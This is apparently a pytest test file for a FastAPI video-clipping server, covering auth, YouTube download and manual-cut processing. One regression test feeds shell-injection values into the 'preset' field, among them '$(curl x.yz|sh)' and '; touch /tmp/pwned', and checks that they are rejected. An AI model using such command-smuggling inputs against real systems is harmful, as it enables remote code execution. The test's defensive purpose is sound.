import json
import os
import pathlib
import shutil
import subprocess
from typing import Any, Dict, List
from unittest.mock import MagicMock, patch

import boto3
import pytest
from fastapi.testclient import TestClient

import local_server
from core.schemas import ClipItem, MomentsExtraction
from core.transcription import WhisperTranscriber
from local_server import app
from tests.manual_cuts_fixture import (
    FIXTURE_CUT_COUNT,
    FIXTURE_MAX_CUT_END_SECONDS,
    load_manual_cuts_payload,
)

client = TestClient(app)

AUTH_HEADERS = {"Authorization": "Bearer test-secret"}


def test_health_check():
    response = client.get("/")
    assert response.status_code == 200
    assert response.json() == {"status": "ok"}


def test_download_youtube_requires_auth_token():
    response = client.post(
        "/download_youtube", json={"url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ"}
    )
    assert response.status_code in (401, 403)


def test_download_youtube_rejects_wrong_auth_token():
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube",
            json={"url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ"},
            headers={"Authorization": "Bearer wrong-token"},
        )
        assert response.status_code == 401


def test_download_youtube_endpoint():
    # Use a dummy invalid URL to just check the route existence and validation
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube",
            json={"url": "invalid", "uploaded_file_id": "123"},
            headers=AUTH_HEADERS,
        )
        # Assuming it throws an error internally or returns a mock success if we patch it
        assert response.status_code in [200, 400, 500]


def test_download_youtube_success_mocked(monkeypatch):
    import subprocess

    def mock_run(*args, **kwargs):
        return subprocess.CompletedProcess(args=args[0], returncode=0)

    monkeypatch.setattr(subprocess, "run", mock_run)

    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube",
            json={"url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ", "s3_bucket": "test-bucket"},
            headers=AUTH_HEADERS,
        )
    assert response.status_code == 200
    data = response.json()
    assert data["success"] is True
    assert "s3_key" in data
    assert "video_url" in data
    assert data["title"] == "Local Video"
    assert data["duration"] == 60
    assert data["durationSeconds"] == 60


def test_download_youtube_missing_url():
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube", json={"uploaded_file_id": "123"}, headers=AUTH_HEADERS
        )
        assert response.status_code == 422


def test_process_video_requires_auth_token():
    response = client.post("/process_video", json={
        "video_url": "/tmp/fake.mp4",
        "uploaded_file_id": "123",
        "user_id": "user123"
    })
    assert response.status_code in (401, 403)


def test_process_video_endpoint():
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/process_video",
            json={
                "video_url": "/tmp/fake.mp4",
                "uploaded_file_id": "123",
                "user_id": "user123"
            },
            headers=AUTH_HEADERS,
        )
        # As long as it hits the endpoint and fails with validation or internal logic, route exists
        assert response.status_code in [200, 422, 500]


# ---------------------------------------------------------------------------
# POST /process_video v2 — manual cuts (spec 2026-10-09 contract v2, sections 6,
# 9 and 10). Phase 1 (RED): these tests must fail until the contract is
# implemented in core/schemas.py, core/video_pipeline.py and local_server.py.
#
# Scope of the mocks: WhisperX (transcriber), Gemini (identify_moments), LR-ASD,
# vertical reframe, subtitles and S3 upload are mocked. The real video is a
# short file generated by ffmpeg, so the cut and the ffprobe duration check
# run for real. The payload comes from tests/fixtures/manual_cuts_payload.json;
# only `s3_key` is replaced with the local file path (test-only substitution).
# ---------------------------------------------------------------------------

REQUIRES_FFMPEG = pytest.mark.skipif(
    shutil.which("ffmpeg") is None or shutil.which("ffprobe") is None,
    reason="ffmpeg/ffprobe are required to generate and probe a real test video",
)

SAMPLE_VIDEO_DURATION_SECONDS = 15

TRANSCRIPT_SEGMENTS: List[Dict[str, Any]] = [
    {"start": 0.0, "end": 0.4, "word": "Olá"},
    {"start": 0.5, "end": 0.9, "word": "pessoal"},
    {"start": 1.0, "end": 1.6, "word": "bem-vindos"},
]


@pytest.fixture(scope="session")
def sample_video_path(tmp_path_factory: pytest.TempPathFactory) -> pathlib.Path:
    video_path = tmp_path_factory.mktemp("videos") / "sample-podcast.mp4"
    subprocess.run(
        [
            "ffmpeg", "-y",
            "-f", "lavfi", "-i",
            f"testsrc=duration={SAMPLE_VIDEO_DURATION_SECONDS}:size=320x240:rate=10",
            "-f", "lavfi", "-i",
            f"sine=frequency=440:duration={SAMPLE_VIDEO_DURATION_SECONDS}",
            "-c:v", "mpeg4", "-c:a", "aac", "-shortest",
            str(video_path),
        ],
        check=True,
        capture_output=True,
    )
    return video_path


@pytest.fixture
def pipeline_env(
    monkeypatch: pytest.MonkeyPatch, sample_video_path: pathlib.Path
) -> Dict[str, Any]:
    from core import clip_pipeline, video_pipeline

    monkeypatch.setenv("AUTH_TOKEN", "test-secret")
    monkeypatch.setattr(local_server, "models_loaded", True)

    transcriber: WhisperTranscriber = MagicMock(spec=WhisperTranscriber)
    transcriber.transcribe.return_value = json.dumps(TRANSCRIPT_SEGMENTS)
    monkeypatch.setattr(local_server.video_processor, "transcriber", transcriber)
    monkeypatch.setattr(local_server.video_processor, "gemini_client", MagicMock())

    identify_moments = MagicMock(
        return_value=MomentsExtraction(
            clips=[
                ClipItem(
                    title="Gancho do Gemini",
                    hook="gancho",
                    start=2.0,
                    end=20.0,
                    virality_score=7,
                    reason="motivo",
                )
            ]
        )
    )
    monkeypatch.setattr(video_pipeline, "identify_moments", identify_moments)

    monkeypatch.setattr(
        clip_pipeline,
        "run_active_speaker_detection",
        MagicMock(return_value=([], [])),
    )
    monkeypatch.setattr(clip_pipeline, "create_vertical_video", MagicMock())
    monkeypatch.setattr(clip_pipeline, "create_subtitles_with_ffmpeg", MagicMock())
    monkeypatch.setattr(boto3, "client", MagicMock(return_value=MagicMock()))

    return {
        "transcriber": transcriber,
        "identify_moments": identify_moments,
        "video_path": sample_video_path,
    }


def _payload_for_local_file(video_path: pathlib.Path) -> Dict[str, Any]:
    payload = load_manual_cuts_payload()
    payload["s3_key"] = str(video_path)
    return payload


@REQUIRES_FFMPEG
class TestProcessVideoManualCutsIntegration:
    def test_manual_cuts_return_clips_at_requested_timestamps(self, pipeline_env):
        payload = _payload_for_local_file(pipeline_env["video_path"])

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 200
        clips = response.json()["clips"]
        assert len(clips) == FIXTURE_CUT_COUNT
        assert [(clip["start"], clip["end"]) for clip in clips] == [
            (0.0, 4.0),
            (4.0, 9.5),
            (8.0, 12.0),
        ]
        assert [clip["title"] for clip in clips] == [
            "Abertura",
            "Manual clip 2",
            "Corte sobreposto",
        ]
        assert all(clip["virality_score"] is None for clip in clips)

    def test_manual_mode_skips_gemini_but_still_transcribes(self, pipeline_env):
        payload = _payload_for_local_file(pipeline_env["video_path"])

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 200
        pipeline_env["identify_moments"].assert_not_called()
        pipeline_env["transcriber"].transcribe.assert_called_once()

    def test_manual_cut_exceeding_real_video_duration_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-06: the video is 15s long, the cut ends at 20s.
        assert FIXTURE_MAX_CUT_END_SECONDS < SAMPLE_VIDEO_DURATION_SECONDS
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["manual_cuts"][-1]["end"] = 20.0

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422
        pipeline_env["transcriber"].transcribe.assert_not_called()

    def test_unknown_field_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-13 / D2
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["video_url"] = "https://example.com/podcast.mp4"

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422

    def test_manual_mode_without_cuts_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-02 / D5: never falls back to the automatic path.
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["manual_cuts"] = []

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422
        pipeline_env["identify_moments"].assert_not_called()

    def test_auto_mode_with_manual_cuts_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-03
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["mode"] = "auto"

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422

    @pytest.mark.parametrize(
        "preset", ["$(curl x.yz|sh)", "`id`", "HORMOZI; touch /tmp/pwned"]
    )
    def test_shell_metachar_preset_returns_422_before_pipeline(self, pipeline_env, preset):
        # RCE regression: preset used to reach a shell=True ffmpeg command.
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["preset"] = preset

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422
        pipeline_env["transcriber"].transcribe.assert_not_called()

    def test_legacy_payload_without_mode_still_runs_automatic_path(self, pipeline_env):
        # Green guard, RN-PIPE-MANUAL-14: a caller with only s3_key/preset keeps working.
        payload = {"s3_key": str(pipeline_env["video_path"]), "preset": "HORMOZI"}

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 200
        pipeline_env["identify_moments"].assert_called_once()
        clips = response.json()["clips"]
        assert len(clips) == 1
        assert clips[0]["title"] == "Gancho do Gemini"
        assert clips[0]["start"] == 2.0
        assert clips[0]["end"] == 20.0
